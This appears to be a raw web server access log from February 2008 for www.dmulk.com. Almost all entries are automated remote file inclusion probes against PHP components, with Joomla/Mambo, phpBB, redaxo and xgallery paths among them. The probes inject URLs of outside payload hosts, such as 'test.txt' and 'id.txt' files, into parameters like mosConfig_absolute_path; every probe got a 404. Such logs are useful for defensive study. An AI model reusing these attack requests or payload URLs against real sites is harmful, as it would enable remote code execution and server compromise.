80.175.48.130 - - [12/Feb/2008:05:30:26 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://75.127.74.194/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
203.157.182.9 - - [12/Feb/2008:05:30:28 -0800] "GET /logs/errors.php?error=http://safebrat.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
203.157.182.9 - - [12/Feb/2008:05:30:28 -0800] "GET /errors.php?error=http://safebrat.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
82.146.33.210 - - [12/Feb/2008:05:31:25 -0800] "GET /logs/index.php?option=com_maxcomment&Itemid=&mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
82.146.33.210 - - [12/Feb/2008:05:31:25 -0800] "GET /index.php?option=com_maxcomment&Itemid=&mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
87.106.131.26 - - [12/Feb/2008:05:31:26 -0800] "GET /logs/index.php?option=com_maxcomment&Itemid=&mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
87.106.131.26 - - [12/Feb/2008:05:31:26 -0800] "GET /index.php?option=com_maxcomment&Itemid=&mosConfig_absolute_path=http://www.surproyecto.com.ar/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
62.168.15.147 - - [12/Feb/2008:05:32:09 -0800] "GET /logs/access_071231.log//skin/zero_vote/error.php?dir=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.209.50 - - [12/Feb/2008:05:35:26 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://heidik.org/canar/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.70.204.99 - - [12/Feb/2008:05:36:56 -0800] "GET //templates/mangobery/footer.sample.php?Site_Path=http://75.127.74.194/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
61.70.204.99 - - [12/Feb/2008:05:36:56 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://75.127.74.194/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
74.6.24.13 - - [12/Feb/2008:05:38:14 -0800] "GET /tmp/sess_b50d2b2a12c8b1ce17e4e6ed2fba1a24 HTTP/1.0" 403 163 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.86.92.9 - - [12/Feb/2008:05:39:16 -0800] "GET /logs/access.log//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.fltowshow.com/administrator/components/com_juser/juser.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.93.255.93 - - [12/Feb/2008:05:39:33 -0800] "GET /logs/access_071230.log//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.fltowshow.com/administrator/components/com_juser/juser.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
77.93.255.93 - - [12/Feb/2008:05:39:33 -0800] "GET //administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.fltowshow.com/administrator/components/com_juser/juser.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
77.93.255.93 - - [12/Feb/2008:05:39:34 -0800] "GET /logs//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.fltowshow.com/administrator/components/com_juser/juser.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
66.249.13.202 - - [12/Feb/2008:05:39:37 -0800] "GET /logs/access_080121.log//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.249.13.202 - - [12/Feb/2008:05:39:38 -0800] "GET //redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.249.13.202 - - [12/Feb/2008:05:39:38 -0800] "GET /logs//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.86.92.9 - - [12/Feb/2008:05:40:18 -0800] "GET /logs/access_080103.log//administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.fltowshow.com/administrator/components/com_juser/juser.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [12/Feb/2008:05:42:03 -0800] "GET //administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.hps-online.com/responder/templates/cmpl/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/t.txt? HTTP/1.1" 404 275 "-" "Super_Ale46" "www.dmulk.com"
62.151.23.213 - - [12/Feb/2008:05:42:03 -0800] "GET /logs//administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.hps-online.com/responder/templates/cmpl/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/t.txt? HTTP/1.1" 404 275 "-" "Super_Ale46" "www.dmulk.com"
212.61.24.106 - - [12/Feb/2008:05:45:47 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.30.214.232 - - [12/Feb/2008:05:46:31 -0800] "GET /logs/access_071230.log HTTP/1.0" 200 231687 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.230.11.181 - - [12/Feb/2008:05:46:46 -0800] "GET /index.php?option=com_maxcomment&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
205.234.97.131 - - [12/Feb/2008:05:46:55 -0800] "GET //index2.php/?mosConfig_absolute_path=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
205.234.97.131 - - [12/Feb/2008:05:46:55 -0800] "GET /logs//index2.php/?mosConfig_absolute_path=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
205.234.97.131 - - [12/Feb/2008:05:46:57 -0800] "GET //include.php?path[docroot]=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
205.234.97.131 - - [12/Feb/2008:05:46:57 -0800] "GET /logs//include.php?path[docroot]=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
205.234.97.131 - - [12/Feb/2008:05:47:07 -0800] "GET /index.php?dir=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
205.234.97.131 - - [12/Feb/2008:05:47:07 -0800] "GET /logs/index.php?dir=http://uniquantum.co.kr/.../robot.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
66.249.13.202 - - [12/Feb/2008:05:47:12 -0800] "GET /logs/access.log//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.89.97 - - [12/Feb/2008:05:47:20 -0800] "GET /index.php?option=com_maxcomment&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.17.209.50 - - [12/Feb/2008:05:47:47 -0800] "GET /logs/access_071231.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://heidik.org/canar/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.209.50 - - [12/Feb/2008:05:47:47 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://heidik.org/canar/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.193.226.10 - - [12/Feb/2008:05:47:57 -0800] "GET /logs/access_080117.log/index.php?body=http://comp-lik.biz/images/library/.../t.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.226.10 - - [12/Feb/2008:05:47:57 -0800] "GET /logs/index.php?body=http://comp-lik.biz/images/library/.../t.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.17.209.50 - - [12/Feb/2008:05:48:18 -0800] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://heidik.org/canar/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.193.226.10 - - [12/Feb/2008:05:48:24 -0800] "GET /logs/access_080131.log/index.php?body=http://comp-lik.biz/images/library/.../t.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.18.136.2 - - [12/Feb/2008:05:49:17 -0800] "GET /logs/access.log/test.php?page=http://www.freewebtown.com/spid3r/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.136.2 - - [12/Feb/2008:05:49:17 -0800] "GET /test.php?page=http://www.freewebtown.com/spid3r/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.136.2 - - [12/Feb/2008:05:49:17 -0800] "GET /logs/test.php?page=http://www.freewebtown.com/spid3r/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
199.216.35.5 - - [12/Feb/2008:05:49:51 -0800] "GET /index.php?option=com_maxcomment&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.234.106.67 - - [12/Feb/2008:05:51:16 -0800] "GET /logs/access_080121.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.106.67 - - [12/Feb/2008:05:51:16 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.106.67 - - [12/Feb/2008:05:51:16 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.106.67 - - [12/Feb/2008:05:52:56 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://branigan.net/img/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.106.67 - - [12/Feb/2008:05:53:11 -0800] "GET /logs/access_080121.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://branigan.net/img/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.106.67 - - [12/Feb/2008:05:53:11 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://branigan.net/img/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.106.67 - - [12/Feb/2008:05:53:11 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://branigan.net/img/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.136.2 - - [12/Feb/2008:05:53:33 -0800] "GET /test.php?page=http://www.freewebtown.com/spid3r/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.136.2 - - [12/Feb/2008:05:53:33 -0800] "GET /logs/test.php?page=http://www.freewebtown.com/spid3r/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.36.135.250 - - [12/Feb/2008:05:54:31 -0800] "GET /logs/access_080117.log/components/com_forum/download.php?phpbb_root_path=http://santamariacenter.com/category.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.135.250 - - [12/Feb/2008:05:54:31 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://santamariacenter.com/category.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.135.250 - - [12/Feb/2008:05:54:31 -0800] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://santamariacenter.com/category.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.97.199.252 - - [12/Feb/2008:05:54:59 -0800] "GET /logs/access_080117.log/components/com_forum/download.php?phpbb_root_path=http://www.keywordcandy.com/downloads/blog.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.97.199.252 - - [12/Feb/2008:05:54:59 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://www.keywordcandy.com/downloads/blog.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.97.199.252 - - [12/Feb/2008:05:54:59 -0800] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.keywordcandy.com/downloads/blog.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.11.210 - - [12/Feb/2008:05:55:37 -0800] "GET /errors.php?error=http://safebrat.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
70.86.11.210 - - [12/Feb/2008:05:55:39 -0800] "GET /logs/errors.php?error=http://safebrat.iespana.es/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
66.194.79.1 - - [12/Feb/2008:05:56:18 -0800] "GET /logs/access_071230.log//language/lang_english/lang_main_album.php?phpbb_root_path=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.194.79.1 - - [12/Feb/2008:05:56:18 -0800] "GET /logs/access_071230.log//lang_english/lang_main_album.php?phpbb_root_path=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.194.79.1 - - [12/Feb/2008:05:56:18 -0800] "GET //lang_english/lang_main_album.php?phpbb_root_path=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.194.79.1 - - [12/Feb/2008:05:56:18 -0800] "GET //language/lang_english/lang_main_album.php?phpbb_root_path=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.194.79.1 - - [12/Feb/2008:05:56:19 -0800] "GET /logs//language/lang_english/lang_main_album.php?phpbb_root_path=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.194.79.1 - - [12/Feb/2008:05:56:19 -0800] "GET /logs//lang_english/lang_main_album.php?phpbb_root_path=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.135.250 - - [12/Feb/2008:05:56:46 -0800] "GET /logs/access.log/test.php?page=http://santamariacenter.com/category.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.135.250 - - [12/Feb/2008:05:56:46 -0800] "GET /test.php?page=http://santamariacenter.com/category.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.135.250 - - [12/Feb/2008:05:56:46 -0800] "GET /logs/test.php?page=http://santamariacenter.com/category.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.151.23.213 - - [12/Feb/2008:05:57:03 -0800] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.hps-online.com/responder/templates/cmpl/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/t.txt? HTTP/1.1" 404 275 "-" "Super_Ale46" "www.dmulk.com"
62.151.23.213 - - [12/Feb/2008:05:57:03 -0800] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.hps-online.com/responder/templates/cmpl/%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/t.txt? HTTP/1.1" 404 275 "-" "Super_Ale46" "www.dmulk.com"
209.97.199.252 - - [12/Feb/2008:05:57:27 -0800] "GET /logs/access.log/test.php?page=http://www.keywordcandy.com/downloads/blog.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.97.199.252 - - [12/Feb/2008:05:57:27 -0800] "GET /test.php?page=http://www.keywordcandy.com/downloads/blog.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.97.199.252 - - [12/Feb/2008:05:57:27 -0800] "GET /logs/test.php?page=http://www.keywordcandy.com/downloads/blog.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.194.79.1 - - [12/Feb/2008:05:58:11 -0800] "GET /logs/access_071230.log//lang_english/lang_main_album.php?phpbb_root_path=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.194.79.1 - - [12/Feb/2008:05:58:11 -0800] "GET //lang_english/lang_main_album.php?phpbb_root_path=http://www.secureonsites.com/_vti_var/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.89.97 - - [12/Feb/2008:05:58:30 -0800] "GET /logs/access_080201.log/index.php?option=com_maxcomment&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.243.54.131 - - [12/Feb/2008:05:59:41 -0800] "GET /logs//components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.fltowshow.com/administrator/components/com_juser/juser.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
72.29.89.97 - - [12/Feb/2008:06:00:38 -0800] "GET /logs/access_080112.log/index.php?option=com_maxcomment&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.116.0.130 - - [12/Feb/2008:06:02:03 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://hornydate.co.uk/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
199.216.35.5 - - [12/Feb/2008:06:02:23 -0800] "GET /logs/access_080201.log/index.php?option=com_maxcomment&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.220.195.20 - - [12/Feb/2008:06:03:21 -0800] "GET /logs/access_071225.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.burhanukum.com/images/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.220.195.20 - - [12/Feb/2008:06:03:21 -0800] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.burhanukum.com/images/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.220.195.20 - - [12/Feb/2008:06:03:21 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.burhanukum.com/images/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.220.195.20 - - [12/Feb/2008:06:03:21 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.burhanukum.com/images/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.50.26 - - [12/Feb/2008:06:04:45 -0800] "GET /logs/access.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http:/bobatka.info/modules/language/asc/asc/c9???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.50.26 - - [12/Feb/2008:06:04:45 -0800] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http:/bobatka.info/modules/language/asc/asc/c9???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.50.26 - - [12/Feb/2008:06:04:45 -0800] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http:/bobatka.info/modules/language/asc/asc/c9???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.151.23.213 - - [12/Feb/2008:06:05:19 -0800] "GET /logs/access_080103.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [12/Feb/2008:06:05:19 -0800] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [12/Feb/2008:06:05:19 -0800] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
199.216.35.5 - - [12/Feb/2008:06:05:33 -0800] "GET /logs/access_080112.log/index.php?option=com_maxcomment&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.25.158 - - [12/Feb/2008:06:05:42 -0800] "GET /?S=D HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
209.35.191.105 - - [12/Feb/2008:06:06:02 -0800] "GET /index.php?sourcedir=http:/www.bwa-handball.de/cms/images/banners/cmd2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
72.36.135.250 - - [12/Feb/2008:06:06:07 -0800] "GET /logs/access_080121.log/components/com_forum/download.php?phpbb_root_path=http://santamariacenter.com/category.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.149.90.29 - - [12/Feb/2008:06:06:13 -0800] "GET /logs//administrator/components/com_jcs/view/register.php?mosconfig_absolute_path=http://www.freewebtown.com/shadowss/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
83.149.90.29 - - [12/Feb/2008:06:06:13 -0800] "GET //administrator/components/com_jcs/view/register.php?mosconfig_absolute_path=http://www.freewebtown.com/shadowss/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
64.38.50.26 - - [12/Feb/2008:06:06:35 -0800] "GET /logs/access_080121.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http:/bobatka.info/modules/language/asc/asc/c9???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.97.199.252 - - [12/Feb/2008:06:07:09 -0800] "GET /logs/access_080121.log/components/com_forum/download.php?phpbb_root_path=http://www.keywordcandy.com/downloads/blog.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
63.87.231.149 - - [12/Feb/2008:06:08:05 -0800] "GET /logs/access_080121.log//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.geocities.com/b1u5crew/injek.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.87.231.149 - - [12/Feb/2008:06:08:06 -0800] "GET //redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.geocities.com/b1u5crew/injek.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.87.231.149 - - [12/Feb/2008:06:08:06 -0800] "GET /logs//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.geocities.com/b1u5crew/injek.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.36.135.250 - - [12/Feb/2008:06:09:44 -0800] "GET /logs/access_080108.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://santamariacenter.com/category.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.135.250 - - [12/Feb/2008:06:09:44 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://santamariacenter.com/category.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.135.250 - - [12/Feb/2008:06:09:44 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://santamariacenter.com/category.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.97.199.252 - - [12/Feb/2008:06:09:51 -0800] "GET /logs/access_080108.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.keywordcandy.com/downloads/blog.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.97.199.252 - - [12/Feb/2008:06:09:51 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.keywordcandy.com/downloads/blog.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.97.199.252 - - [12/Feb/2008:06:09:51 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.keywordcandy.com/downloads/blog.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.135.250 - - [12/Feb/2008:06:10:46 -0800] "GET /logs/access_080106.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://santamariacenter.com/category.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.97.199.252 - - [12/Feb/2008:06:10:50 -0800] "GET /logs/access_080106.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.keywordcandy.com/downloads/blog.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.61.24.106 - - [12/Feb/2008:06:11:04 -0800] "GET /logs/access_080106.log/skin/zero_vote/ask_password.php?dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.61.24.106 - - [12/Feb/2008:06:11:04 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.61.24.106 - - [12/Feb/2008:06:11:05 -0800] "GET /logs/skin/zero_vote/ask_password.php?dir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
